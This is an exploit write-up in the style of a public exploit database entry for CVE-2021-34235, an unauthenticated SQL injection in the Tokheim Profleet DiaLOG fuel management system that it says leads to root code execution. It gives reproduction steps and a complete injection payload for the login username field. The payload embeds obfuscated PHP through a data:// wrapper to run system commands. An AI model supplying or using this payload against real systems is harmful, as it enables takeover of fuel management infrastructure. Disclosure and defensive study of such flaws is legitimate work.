# Exploit Title: Tokheim Profleet DiaLOG Fuel Management System 11.005.02 - SQLi (Unauthenticated)
# Date: 02/9/2022
# Exploit Author: golem445
# Vendor Homepage: https://www.tsg-solutions.com
# Tested on: Kali Linux
# CVE: CVE-2021-34235
# Description: Field__UserLogin parameter is vulnerable to crafted MySQL injection, resulting in remote code execution as root.
==Steps to Reproduce==
# Go to : http://dialog_host/login.php
# Enter escaped MySQL query into the username field and submit, passwords doesn't matter. (Such as: ' /*!50000union*/ select 1,2,3,4,5,6,7,8,’data://text/plain,<?php $a=”sy”;$b=”stem”;$c=$a.$b; $c(“uname -a”);?>’ -- -)
# This can also be accomplished via intercepting the logon submission with Burp Proxy, then entering your MySQL query into the Field_UserLogin parameter.
This vulnerability appears rooted in a logic flaw. Typical authentication logic flow is a user submitting their credentials, authentication success/failure occurs, followed with results being noted in a log. This application appears to work inversely, i.e. logon attempt is logged, then the users credentials are checked.